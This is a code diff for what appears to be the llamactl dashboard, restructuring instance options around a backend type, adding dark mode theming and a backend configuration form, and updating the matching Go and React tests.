@@ -216,7 +222,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{ {
name: "all safe fields", name: "all safe fields",
options: &instance.CreateInstanceOptions{ options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
HFRepo: "microsoft/DialoGPT-medium", HFRepo: "microsoft/DialoGPT-medium",
LogFile: "/tmp/llama.log", LogFile: "/tmp/llama.log",
@@ -244,7 +251,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
AutoRestart: testutil.BoolPtr(true), AutoRestart: testutil.BoolPtr(true),
MaxRestarts: testutil.IntPtr(5), MaxRestarts: testutil.IntPtr(5),
RestartDelay: testutil.IntPtr(10), RestartDelay: testutil.IntPtr(10),
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: 8080, Port: 8080,
GPULayers: 32, GPULayers: 32,
CtxSize: 4096, CtxSize: 4096,

View File

@@ -7,6 +7,7 @@ import SystemInfoDialog from "./components/SystemInfoDialog";
import { type CreateInstanceOptions, type Instance } from "@/types/instance"; import { type CreateInstanceOptions, type Instance } from "@/types/instance";
import { useInstances } from "@/contexts/InstancesContext"; import { useInstances } from "@/contexts/InstancesContext";
import { useAuth } from "@/contexts/AuthContext"; import { useAuth } from "@/contexts/AuthContext";
import { ThemeProvider } from "@/contexts/ThemeContext";
function App() { function App() {
const { isAuthenticated, isLoading: authLoading } = useAuth(); const { isAuthenticated, isLoading: authLoading } = useAuth();
@@ -29,9 +30,9 @@ function App() {
const handleSaveInstance = (name: string, options: CreateInstanceOptions) => { const handleSaveInstance = (name: string, options: CreateInstanceOptions) => {
if (editingInstance) { if (editingInstance) {
updateInstance(editingInstance.name, options); void updateInstance(editingInstance.name, options);
} else { } else {
createInstance(name, options); void createInstance(name, options);
} }
}; };
@@ -42,27 +43,32 @@ function App() {
// Show loading spinner while checking auth // Show loading spinner while checking auth
if (authLoading) { if (authLoading) {
return ( return (
<div className="min-h-screen bg-gray-50 flex items-center justify-center"> <ThemeProvider>
<div className="min-h-screen bg-background flex items-center justify-center">
<div className="text-center"> <div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div> <div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
<p className="text-gray-600">Loading...</p> <p className="text-muted-foreground">Loading...</p>
</div> </div>
</div> </div>
</ThemeProvider>
); );
} }
// Show login dialog if not authenticated // Show login dialog if not authenticated
if (!isAuthenticated) { if (!isAuthenticated) {
return ( return (
<div className="min-h-screen bg-gray-50"> <ThemeProvider>
<div className="min-h-screen bg-background">
<LoginDialog open={true} /> <LoginDialog open={true} />
</div> </div>
</ThemeProvider>
); );
} }
// Show main app if authenticated // Show main app if authenticated
return ( return (
<div className="min-h-screen bg-gray-50"> <ThemeProvider>
<div className="min-h-screen bg-background">
<Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} /> <Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
<main className="container mx-auto max-w-4xl px-4 py-8"> <main className="container mx-auto max-w-4xl px-4 py-8">
<InstanceList editInstance={handleEditInstance} /> <InstanceList editInstance={handleEditInstance} />
@@ -80,6 +86,7 @@ function App() {
onOpenChange={setIsSystemInfoModalOpen} onOpenChange={setIsSystemInfoModalOpen}
/> />
</div> </div>
</ThemeProvider>
); );
} }

View File

@@ -5,6 +5,7 @@ import App from '@/App'
import { InstancesProvider } from '@/contexts/InstancesContext' import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api' import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance' import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext' import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API // Mock the API
@@ -46,8 +47,8 @@ function renderApp() {
describe('App Component - Critical Business Logic Only', () => { describe('App Component - Critical Business Logic Only', () => {
const mockInstances: Instance[] = [ const mockInstances: Instance[] = [
{ name: 'test-instance-1', running: false, options: { model: 'model1.gguf' } }, { name: 'test-instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'test-instance-2', running: true, options: { model: 'model2.gguf' } } { name: 'test-instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } }
] ]
beforeEach(() => { beforeEach(() => {
@@ -55,6 +56,21 @@ describe('App Component - Critical Business Logic Only', () => {
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances) vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123') window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 }))) global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
// Mock window.matchMedia for dark mode functionality
Object.defineProperty(window, 'matchMedia', {
writable: true,
value: vi.fn().mockImplementation((query: string) => ({
matches: false,
media: query,
onchange: null,
addListener: vi.fn(),
removeListener: vi.fn(),
addEventListener: vi.fn(),
removeEventListener: vi.fn(),
dispatchEvent: vi.fn(),
})),
})
}) })
afterEach(() => { afterEach(() => {
@@ -66,8 +82,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup() const user = userEvent.setup()
const newInstance: Instance = { const newInstance: Instance = {
name: 'new-test-instance', name: 'new-test-instance',
running: false, status: 'stopped',
options: { model: 'new-model.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'new-model.gguf' } }
} }
vi.mocked(instancesApi.create).mockResolvedValue(newInstance) vi.mocked(instancesApi.create).mockResolvedValue(newInstance)
@@ -90,6 +106,7 @@ describe('App Component - Critical Business Logic Only', () => {
await waitFor(() => { await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith('new-test-instance', { expect(instancesApi.create).toHaveBeenCalledWith('new-test-instance', {
auto_restart: true, // Default value auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
}) })
}) })
@@ -103,8 +120,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup() const user = userEvent.setup()
const updatedInstance: Instance = { const updatedInstance: Instance = {
name: 'test-instance-1', name: 'test-instance-1',
running: false, status: 'stopped',
options: { model: 'updated-model.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'updated-model.gguf' } }
} }
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance) vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance)
@@ -123,7 +140,8 @@ describe('App Component - Critical Business Logic Only', () => {
// Verify correct API call with existing instance data // Verify correct API call with existing instance data
await waitFor(() => { await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith('test-instance-1', { expect(instancesApi.update).toHaveBeenCalledWith('test-instance-1', {
model: "model1.gguf", // Pre-filled from existing instance backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "model1.gguf" } // Pre-filled from existing instance
}) })
}) })
}) })

View File

@@ -0,0 +1,123 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox'
import type { BackendOptions } from '@/schemas/instanceOptions'
import { getBackendFieldType, basicBackendFieldsConfig } from '@/lib/zodFormUtils'
interface BackendFormFieldProps {
fieldKey: keyof BackendOptions
value: string | number | boolean | string[] | undefined
onChange: (key: string, value: string | number | boolean | string[] | undefined) => void
}
const BackendFormField: React.FC<BackendFormFieldProps> = ({ fieldKey, value, onChange }) => {
// Get configuration for basic fields, or use field name for advanced fields
const config = basicBackendFieldsConfig[fieldKey as string] || { label: fieldKey }
// Get type from Zod schema
const fieldType = getBackendFieldType(fieldKey)
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey as string, newValue)
}
const renderField = () => {
switch (fieldType) {
case 'boolean':
return (
<div className="flex items-center space-x-2">
<Checkbox
id={fieldKey}
checked={typeof value === 'boolean' ? value : false}
onCheckedChange={(checked) => handleChange(checked)}
/>
<Label htmlFor={fieldKey} className="text-sm font-normal">
{config.label}
{config.description && (
<span className="text-muted-foreground ml-1">- {config.description}</span>
)}
</Label>
</div>
)
case 'number':
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="number"
step="any" // This allows decimal numbers
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => {
const numValue = e.target.value ? parseFloat(e.target.value) : undefined
// Only update if the parsed value is valid or the input is empty
if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
handleChange(numValue)
}
}}
placeholder={config.placeholder}
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
case 'array':
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={Array.isArray(value) ? value.join(', ') : ''}
onChange={(e) => {
const arrayValue = e.target.value
? e.target.value.split(',').map(s => s.trim()).filter(Boolean)
: undefined
handleChange(arrayValue)
}}
placeholder="item1, item2, item3"
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
<p className="text-xs text-muted-foreground">Separate multiple values with commas</p>
</div>
)
case 'text':
default:
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => handleChange(e.target.value || undefined)}
placeholder={config.placeholder}
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
}
}
return <div className="space-y-2">{renderField()}</div>
}
export default BackendFormField

View File

@@ -1,6 +1,7 @@
import { Button } from "@/components/ui/button"; import { Button } from "@/components/ui/button";
import { HelpCircle, LogOut } from "lucide-react"; import { HelpCircle, LogOut, Moon, Sun } from "lucide-react";
import { useAuth } from "@/contexts/AuthContext"; import { useAuth } from "@/contexts/AuthContext";
import { useTheme } from "@/contexts/ThemeContext";
interface HeaderProps { interface HeaderProps {
onCreateInstance: () => void; onCreateInstance: () => void;
@@ -9,6 +10,7 @@ interface HeaderProps {
function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) { function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
const { logout } = useAuth(); const { logout } = useAuth();
const { theme, toggleTheme } = useTheme();
const handleLogout = () => { const handleLogout = () => {
if (confirm("Are you sure you want to logout?")) { if (confirm("Are you sure you want to logout?")) {
@@ -17,10 +19,10 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
}; };
return ( return (
<header className="bg-white border-b border-gray-200"> <header className="bg-card border-b border-border">
<div className="container mx-auto max-w-4xl px-4 py-4"> <div className="container mx-auto max-w-4xl px-4 py-4">
<div className="flex items-center justify-between"> <div className="flex items-center justify-between">
<h1 className="text-2xl font-bold text-gray-900"> <h1 className="text-2xl font-bold text-foreground">
Llamactl Dashboard Llamactl Dashboard
</h1> </h1>
@@ -29,6 +31,16 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
Create Instance Create Instance
</Button> </Button>
<Button
variant="outline"
size="icon"
onClick={toggleTheme}
data-testid="theme-toggle-button"
title={`Switch to ${theme === 'light' ? 'dark' : 'light'} mode`}
>
{theme === 'light' ? <Moon className="h-4 w-4" /> : <Sun className="h-4 w-4" />}
</Button>
<Button <Button
variant="outline" variant="outline"
size="icon" size="icon"

View File

@@ -27,6 +27,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return <XCircle className="h-3 w-3" />; return <XCircle className="h-3 w-3" />;
case "unknown": case "unknown":
return <Loader2 className="h-3 w-3 animate-spin" />; return <Loader2 className="h-3 w-3 animate-spin" />;
case "failed":
return <XCircle className="h-3 w-3" />;
} }
}; };
@@ -40,6 +42,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "destructive"; return "destructive";
case "unknown": case "unknown":
return "secondary"; return "secondary";
case "failed":
return "destructive";
} }
}; };
@@ -53,6 +57,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "Error"; return "Error";
case "unknown": case "unknown":
return "Unknown"; return "Unknown";
case "failed":
return "Failed";
} }
}; };

View File

@@ -24,7 +24,7 @@ function InstanceCard({
editInstance, editInstance,
}: InstanceCardProps) { }: InstanceCardProps) {
const [isLogsOpen, setIsLogsOpen] = useState(false); const [isLogsOpen, setIsLogsOpen] = useState(false);
const health = useInstanceHealth(instance.name, instance.running); const health = useInstanceHealth(instance.name, instance.status);
const handleStart = () => { const handleStart = () => {
startInstance(instance.name); startInstance(instance.name);
@@ -50,13 +50,15 @@ function InstanceCard({
setIsLogsOpen(true); setIsLogsOpen(true);
}; };
const running = instance.status === "running";
return ( return (
<> <>
<Card> <Card>
<CardHeader className="pb-3"> <CardHeader className="pb-3">
<div className="flex items-center justify-between"> <div className="flex items-center justify-between">
<CardTitle className="text-lg">{instance.name}</CardTitle> <CardTitle className="text-lg">{instance.name}</CardTitle>
{instance.running && <HealthBadge health={health} />} {running && <HealthBadge health={health} />}
</div> </div>
</CardHeader> </CardHeader>
@@ -66,7 +68,7 @@ function InstanceCard({
size="sm" size="sm"
variant="outline" variant="outline"
onClick={handleStart} onClick={handleStart}
disabled={instance.running} disabled={running}
title="Start instance" title="Start instance"
data-testid="start-instance-button" data-testid="start-instance-button"
> >
@@ -77,7 +79,7 @@ function InstanceCard({
size="sm" size="sm"
variant="outline" variant="outline"
onClick={handleStop} onClick={handleStop}
disabled={!instance.running} disabled={!running}
title="Stop instance" title="Stop instance"
data-testid="stop-instance-button" data-testid="stop-instance-button"
> >
@@ -108,7 +110,7 @@ function InstanceCard({
size="sm" size="sm"
variant="destructive" variant="destructive"
onClick={handleDelete} onClick={handleDelete}
disabled={instance.running} disabled={running}
title="Delete instance" title="Delete instance"
data-testid="delete-instance-button" data-testid="delete-instance-button"
> >
@@ -122,7 +124,7 @@ function InstanceCard({
open={isLogsOpen} open={isLogsOpen}
onOpenChange={setIsLogsOpen} onOpenChange={setIsLogsOpen}
instanceName={instance.name} instanceName={instance.name}
isRunning={instance.running} isRunning={running}
/> />
</> </>
); );

View File

@@ -10,10 +10,11 @@ import {
DialogHeader, DialogHeader,
DialogTitle, DialogTitle,
} from "@/components/ui/dialog"; } from "@/components/ui/dialog";
import type { CreateInstanceOptions, Instance } from "@/types/instance"; import { BackendType, type CreateInstanceOptions, type Instance } from "@/types/instance";
import { getBasicFields, getAdvancedFields } from "@/lib/zodFormUtils"; import { getBasicFields, getAdvancedFields, getBasicBackendFields, getAdvancedBackendFields } from "@/lib/zodFormUtils";
import { ChevronDown, ChevronRight } from "lucide-react"; import { ChevronDown, ChevronRight } from "lucide-react";
import ZodFormField from "@/components/ZodFormField"; import ZodFormField from "@/components/ZodFormField";
import BackendFormField from "@/components/BackendFormField";
interface InstanceDialogProps { interface InstanceDialogProps {
open: boolean; open: boolean;
@@ -29,7 +30,6 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
instance, instance,
}) => { }) => {
const isEditing = !!instance; const isEditing = !!instance;
const isRunning = instance?.running || true; // Assume running if instance exists
const [instanceName, setInstanceName] = useState(""); const [instanceName, setInstanceName] = useState("");
const [formData, setFormData] = useState<CreateInstanceOptions>({}); const [formData, setFormData] = useState<CreateInstanceOptions>({});
@@ -39,6 +39,8 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Get field lists dynamically from the type // Get field lists dynamically from the type
const basicFields = getBasicFields(); const basicFields = getBasicFields();
const advancedFields = getAdvancedFields(); const advancedFields = getAdvancedFields();
const basicBackendFields = getBasicBackendFields();
const advancedBackendFields = getAdvancedBackendFields();
// Reset form when dialog opens/closes or when instance changes // Reset form when dialog opens/closes or when instance changes
useEffect(() => { useEffect(() => {
@@ -52,6 +54,8 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
setInstanceName(""); setInstanceName("");
setFormData({ setFormData({
auto_restart: true, // Default value auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP, // Default backend type
backend_options: {},
}); });
} }
setShowAdvanced(false); // Always start with basic view setShowAdvanced(false); // Always start with basic view
@@ -66,6 +70,16 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
})); }));
}; };
const handleBackendFieldChange = (key: string, value: any) => {
setFormData((prev) => ({
...prev,
backend_options: {
...prev.backend_options,
[key]: value,
},
}));
};
const handleNameChange = (name: string) => { const handleNameChange = (name: string) => {
setInstanceName(name); setInstanceName(name);
// Validate instance name // Validate instance name
@@ -90,7 +104,24 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Clean up undefined values to avoid sending empty fields // Clean up undefined values to avoid sending empty fields
const cleanOptions: CreateInstanceOptions = {}; const cleanOptions: CreateInstanceOptions = {};
Object.entries(formData).forEach(([key, value]) => { Object.entries(formData).forEach(([key, value]) => {
if (value !== undefined && value !== "" && value !== null) { if (key === 'backend_options' && value && typeof value === 'object') {
// Handle backend_options specially - clean nested object
const cleanBackendOptions: any = {};
Object.entries(value).forEach(([backendKey, backendValue]) => {
if (backendValue !== undefined && backendValue !== null && (typeof backendValue !== 'string' || backendValue.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(backendValue) && backendValue.length === 0) {
return;
}
cleanBackendOptions[backendKey] = backendValue;
}
});
// Only include backend_options if it has content
if (Object.keys(cleanBackendOptions).length > 0) {
(cleanOptions as any)[key] = cleanBackendOptions;
}
} else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
// Handle arrays - don't include empty arrays // Handle arrays - don't include empty arrays
if (Array.isArray(value) && value.length === 0) { if (Array.isArray(value) && value.length === 0) {
return; return;
@@ -114,6 +145,16 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Check if auto_restart is enabled // Check if auto_restart is enabled
const isAutoRestartEnabled = formData.auto_restart === true; const isAutoRestartEnabled = formData.auto_restart === true;
// Save button label logic
let saveButtonLabel = "Create Instance";
if (isEditing) {
if (instance?.status === "running") {
saveButtonLabel = "Update & Restart Instance";
} else {
saveButtonLabel = "Update Instance";
}
}
return ( return (
<Dialog open={open} onOpenChange={onOpenChange}> <Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent className="sm:max-w-[600px] max-h-[80vh] overflow-hidden flex flex-col"> <DialogContent className="sm:max-w-[600px] max-h-[80vh] overflow-hidden flex flex-col">
@@ -187,8 +228,9 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
(fieldKey) => (fieldKey) =>
fieldKey !== "auto_restart" && fieldKey !== "auto_restart" &&
fieldKey !== "max_restarts" && fieldKey !== "max_restarts" &&
fieldKey !== "restart_delay" fieldKey !== "restart_delay" &&
) // Exclude auto_restart, max_restarts, and restart_delay as they're handled above fieldKey !== "backend_options" // backend_options is handled separately
)
.map((fieldKey) => ( .map((fieldKey) => (
<ZodFormField <ZodFormField
key={fieldKey} key={fieldKey}
@@ -199,6 +241,21 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
))} ))}
</div> </div>
{/* Backend Configuration Section */}
<div className="space-y-4">
<h3 className="text-lg font-medium">Backend Configuration</h3>
{/* Basic backend fields */}
{basicBackendFields.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData.backend_options?.[fieldKey]}
onChange={handleBackendFieldChange}
/>
))}
</div>
{/* Advanced Fields Toggle */} {/* Advanced Fields Toggle */}
<div className="border-t pt-4"> <div className="border-t pt-4">
<Button <Button
@@ -217,8 +274,8 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
{ {
advancedFields.filter( advancedFields.filter(
(f) => (f) =>
!["max_restarts", "restart_delay"].includes(f as string) !["max_restarts", "restart_delay", "backend_options"].includes(f as string)
).length ).length + advancedBackendFields.length
}{" "} }{" "}
options) options)
</span> </span>
@@ -228,24 +285,51 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
{/* Advanced Fields - Automatically generated from type (excluding restart options) */} {/* Advanced Fields - Automatically generated from type (excluding restart options) */}
{showAdvanced && ( {showAdvanced && (
<div className="space-y-4 pl-6 border-l-2 border-muted"> <div className="space-y-4 pl-6 border-l-2 border-muted">
<div className="space-y-4"> {/* Advanced instance fields */}
{advancedFields {advancedFields
.filter( .filter(
(fieldKey) => (fieldKey) =>
!["max_restarts", "restart_delay"].includes( !["max_restarts", "restart_delay", "backend_options"].includes(
fieldKey as string fieldKey as string
) )
) // Exclude restart options as they're handled above ).length > 0 && (
<div className="space-y-4">
<h4 className="text-md font-medium">Advanced Instance Configuration</h4>
{advancedFields
.filter(
(fieldKey) =>
!["max_restarts", "restart_delay", "backend_options"].includes(
fieldKey as string
)
)
.sort() .sort()
.map((fieldKey) => ( .map((fieldKey) => (
<ZodFormField <ZodFormField
key={fieldKey} key={fieldKey}
fieldKey={fieldKey} fieldKey={fieldKey}
value={formData[fieldKey]} value={fieldKey === 'backend_options' ? undefined : formData[fieldKey]}
onChange={handleFieldChange} onChange={handleFieldChange}
/> />
))} ))}
</div> </div>
)}
{/* Advanced backend fields */}
{advancedBackendFields.length > 0 && (
<div className="space-y-4">
<h4 className="text-md font-medium">Advanced Backend Configuration</h4>
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData.backend_options?.[fieldKey]}
onChange={handleBackendFieldChange}
/>
))}
</div>
)}
</div> </div>
)} )}
</div> </div>
@@ -264,11 +348,7 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
disabled={!instanceName.trim() || !!nameError} disabled={!instanceName.trim() || !!nameError}
data-testid="dialog-save-button" data-testid="dialog-save-button"
> >
{isEditing {saveButtonLabel}
? isRunning
? "Update & Restart Instance"
: "Update Instance"
: "Create Instance"}
</Button> </Button>
</DialogFooter> </DialogFooter>
</DialogContent> </DialogContent>

View File

@@ -18,8 +18,8 @@ function InstanceList({ editInstance }: InstanceListProps) {
return ( return (
<div className="flex items-center justify-center py-12" aria-label="Loading"> <div className="flex items-center justify-center py-12" aria-label="Loading">
<div className="text-center"> <div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div> <div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
<p className="text-gray-600">Loading instances...</p> <p className="text-muted-foreground">Loading instances...</p>
</div> </div>
</div> </div>
) )
@@ -28,7 +28,7 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (error) { if (error) {
return ( return (
<div className="text-center py-12"> <div className="text-center py-12">
<div className="text-red-600 mb-4"> <div className="text-destructive mb-4">
<p className="text-lg font-semibold">Error loading instances</p> <p className="text-lg font-semibold">Error loading instances</p>
<p className="text-sm">{error}</p> <p className="text-sm">{error}</p>
</div> </div>
@@ -39,15 +39,15 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (instances.length === 0) { if (instances.length === 0) {
return ( return (
<div className="text-center py-12"> <div className="text-center py-12">
<p className="text-gray-600 text-lg mb-2">No instances found</p> <p className="text-foreground text-lg mb-2">No instances found</p>
<p className="text-gray-500 text-sm">Create your first instance to get started</p> <p className="text-muted-foreground text-sm">Create your first instance to get started</p>
</div> </div>
) )
} }
return ( return (
<div className="space-y-4"> <div className="space-y-4">
<h2 className="text-xl font-semibold text-gray-900 mb-6"> <h2 className="text-xl font-semibold text-foreground mb-6">
Instances ({instances.length}) Instances ({instances.length})
</h2> </h2>

View File

@@ -19,6 +19,15 @@ import {
} from 'lucide-react' } from 'lucide-react'
import { serverApi } from '@/lib/api' import { serverApi } from '@/lib/api'
// Helper to get version from environment
const getAppVersion = (): string => {
try {
return (import.meta.env as Record<string, string>).VITE_APP_VERSION || 'unknown'
} catch {
return 'unknown'
}
}
interface SystemInfoModalProps { interface SystemInfoModalProps {
open: boolean open: boolean
onOpenChange: (open: boolean) => void onOpenChange: (open: boolean) => void
@@ -109,9 +118,20 @@ const SystemInfoDialog: React.FC<SystemInfoModalProps> = ({
</div> </div>
) : systemInfo ? ( ) : systemInfo ? (
<div className="space-y-6"> <div className="space-y-6">
{/* Version Section */} {/* Llamactl Version Section */}
<div className="space-y-3"> <div className="space-y-3">
<h3 className="font-semibold">Version</h3> <h3 className="font-semibold">Llamactl Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{getAppVersion()}
</pre>
</div>
</div>
{/* Llama Server Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">Llama Server Version</h3>
<div className="bg-gray-900 rounded-lg p-4"> <div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2"> <div className="mb-2">

View File

@@ -3,6 +3,7 @@ import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label' import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox' import { Checkbox } from '@/components/ui/checkbox'
import type { CreateInstanceOptions } from '@/types/instance' import type { CreateInstanceOptions } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils' import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
interface ZodFormFieldProps { interface ZodFormFieldProps {
@@ -23,6 +24,30 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
} }
const renderField = () => { const renderField = () => {
// Special handling for backend_type field - render as dropdown
if (fieldKey === 'backend_type') {
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<select
id={fieldKey}
value={typeof value === 'string' ? value : BackendType.LLAMA_CPP}
onChange={(e) => handleChange(e.target.value || undefined)}
className="flex h-10 w-full rounded-md border border-input bg-background px-3 py-2 text-sm ring-offset-background file:border-0 file:bg-transparent file:text-sm file:font-medium placeholder:text-muted-foreground focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring focus-visible:ring-offset-2 disabled:cursor-not-allowed disabled:opacity-50"
>
<option value={BackendType.LLAMA_CPP}>Llama Server</option>
{/* Add more backend types here as they become available */}
</select>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
}
switch (fieldType) { switch (fieldType) {
case 'boolean': case 'boolean':
return ( return (

View File

@@ -3,6 +3,7 @@ import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event' import userEvent from '@testing-library/user-event'
import InstanceCard from '@/components/InstanceCard' import InstanceCard from '@/components/InstanceCard'
import type { Instance } from '@/types/instance' import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
// Mock the health hook since we're not testing health logic here // Mock the health hook since we're not testing health logic here
vi.mock('@/hooks/useInstanceHealth', () => ({ vi.mock('@/hooks/useInstanceHealth', () => ({
@@ -17,14 +18,14 @@ describe('InstanceCard - Instance Actions and State', () => {
const stoppedInstance: Instance = { const stoppedInstance: Instance = {
name: 'test-instance', name: 'test-instance',
running: false, status: 'stopped',
options: { model: 'test-model.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'test-model.gguf' } }
} }
const runningInstance: Instance = { const runningInstance: Instance = {
name: 'running-instance', name: 'running-instance',
running: true, status: 'running',
options: { model: 'running-model.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'running-model.gguf' } }
} }
beforeEach(() => { beforeEach(() => {
@@ -301,7 +302,7 @@ afterEach(() => {
it('handles instance with minimal data', () => { it('handles instance with minimal data', () => {
const minimalInstance: Instance = { const minimalInstance: Instance = {
name: 'minimal', name: 'minimal',
running: false, status: 'stopped',
options: {} options: {}
} }
@@ -323,7 +324,7 @@ afterEach(() => {
it('handles instance with undefined options', () => { it('handles instance with undefined options', () => {
const instanceWithoutOptions: Instance = { const instanceWithoutOptions: Instance = {
name: 'no-options', name: 'no-options',
running: true, status: 'running',
options: undefined options: undefined
} }

View File

@@ -5,6 +5,7 @@ import InstanceList from '@/components/InstanceList'
import { InstancesProvider } from '@/contexts/InstancesContext' import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api' import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance' import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext' import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API // Mock the API
@@ -44,9 +45,9 @@ describe('InstanceList - State Management and UI Logic', () => {
const mockEditInstance = vi.fn() const mockEditInstance = vi.fn()
const mockInstances: Instance[] = [ const mockInstances: Instance[] = [
{ name: 'instance-1', running: false, options: { model: 'model1.gguf' } }, { name: 'instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'instance-2', running: true, options: { model: 'model2.gguf' } }, { name: 'instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } },
{ name: 'instance-3', running: false, options: { model: 'model3.gguf' } } { name: 'instance-3', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model3.gguf' } } }
] ]
